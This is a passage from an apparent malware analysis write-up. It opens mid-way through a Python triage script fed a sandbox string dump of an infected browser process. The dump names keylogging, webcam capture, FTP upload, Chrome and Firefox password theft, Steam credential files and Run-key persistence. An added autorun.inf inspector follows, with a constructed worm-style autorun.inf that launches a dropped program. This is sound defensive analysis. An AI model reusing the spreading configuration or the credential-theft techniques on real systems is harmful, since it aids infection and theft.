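    "<b>iexplore.exe_396_rwx_04B40000_00001000:</b><pre>GetAsyncKeyState</pre>"
    "<b>iexplore.exe_396_rwx_04C40000_00001000:</b><pre>ExitWindowsEx</pre>"
    "<b>iexplore.exe_396_rwx_05550000_00001000:</b><pre>FtpOpenFileA</pre>"
    "<b>iexplore.exe_396_rwx_064E0000_00001000:</b><pre>AVICAP32.DLL</pre>"
    "<b>iexplore.exe_396_rwx_10410000_0005C000:</b>"
    "<pre>URLDownloadToFileA</pre><pre>autorun.inf</pre><pre>shellexecute=</pre>"
    "<pre>GetChromePass</pre><pre>Mozilla3_5Password</pre>"
    "<pre>\\config\\SteamAppData.vdf</pre>"
    "<pre>BTMemoryLoadLibary: BuildImportTable failed</pre>"
    "<pre>Software\\Microsoft\\Windows\\CurrentVersion\\Run</pre>"
    "<pre>keyloggerativar</pre><pre>webcamgetbuffer</pre><pre>sendftp</pre>"
)

if __name__ == "__main__":
    summary = summarize(parse_dump(SAMPLE_DUMP))
    print(f"RWX regions: {summary['rwx_regions']} "
          f"({summary['single_page_rwx']} single-page stubs)")
    for base, size in summary["large_rwx"]:
        print(f"large RWX image at {base:08X}, size {size:#x}")
    for cap, hits in summary["capabilities"].items():
        print(f"{cap}: {', '.join(hits)}")
```

To run it on the listing itself, join the raw `<b>…</b><pre>…</pre>` lines with an empty separator first (the extraction breaks labels such as `iexplore.e` / `xe_396_…` across lines), then call `summarize(parse_dump(joined))`. The substring indicators are deliberately loose; they are a triage aid for reading a sandbox dump, not a detection signature.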
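The strings autorun.inf, shellexecute= and icon=shell32.dll,4 in the same region are the removable-drive spreading mechanism: the worm writes an autorun.inf whose shellexecute directive points at its dropped copy and whose icon directive borrows a stock shell32.dll icon so the drive presents as an ordinary folder. The following is an added example from the editor, not the report's or the sample's code, of the check a responder would run on an autorun.inf recovered from a suspect drive. The file content is constructed, and the target name RECYCLER\dropped.exe is hypothetical.

```python
"""
autorun.inf inspector: flags launch directives (open=, shellexecute=,
shell\<verb>\command=) and shell32.dll icon spoofing of the kind
removable-drive worms write.  Added example, not part of the original report.
"""
import configparser

LAUNCH_KEYS = ("open", "shellexecute")

# Constructed sample of a worm-written autorun.inf; the target path is hypothetical.
SAMPLE_AUTORUN = r"""
[autorun]
icon=shell32.dll,4
action=Open folder to view files
shellexecute=RECYCLER\dropped.exe
shell\open\command=RECYCLER\dropped.exe
UseAutoPlay=1
"""


def inspect_autorun(text):
    """Return a list of (category, key, value) findings.

    category is "launch" for any directive that runs a program when the
    drive is opened, "icon-spoof" when the icon is borrowed from shell32.dll
    (legitimate media rarely does this; worms do it so the drive looks like
    a folder)."""
    cp = configparser.RawConfigParser(strict=False, delimiters=("=",))
    cp.read_string(text)
    section = next((s for s in cp.sections() if s.lower() == "autorun"), None)
    if section is None:
        return []
    findings = []
    for key, value in cp.items(section):
        k = key.lower()  # configparser already lowercases, kept explicit
        if k in LAUNCH_KEYS or (k.startswith("shell\\") and k.endswith("\\command")):
            findings.append(("launch", key, value.strip()))
        elif k == "icon" and "shell32.dll" in value.lower():
            findings.append(("icon-spoof", key, value.strip()))
    return findings


def launch_targets(findings):
    """Distinct programs the file would launch; hand these to the file triage."""
    return {value for category, _, value in findings if category == "launch"}


if __name__ == "__main__":
    result = inspect_autorun(SAMPLE_AUTORUN)
    for category, key, value in result:
        print(f"{category:10} {key} = {value}")
    print("launch targets:", launch_targets(result))
```

On Windows XP SP3, the platform this sample was analysed on, AutoRun honoured shellexecute= on USB drives unless update KB971029 was installed; Windows 7 and later ignore autorun.inf on non-optical removable media, so there the file is evidence of infection rather than a launch vector, and the launch targets are what to collect.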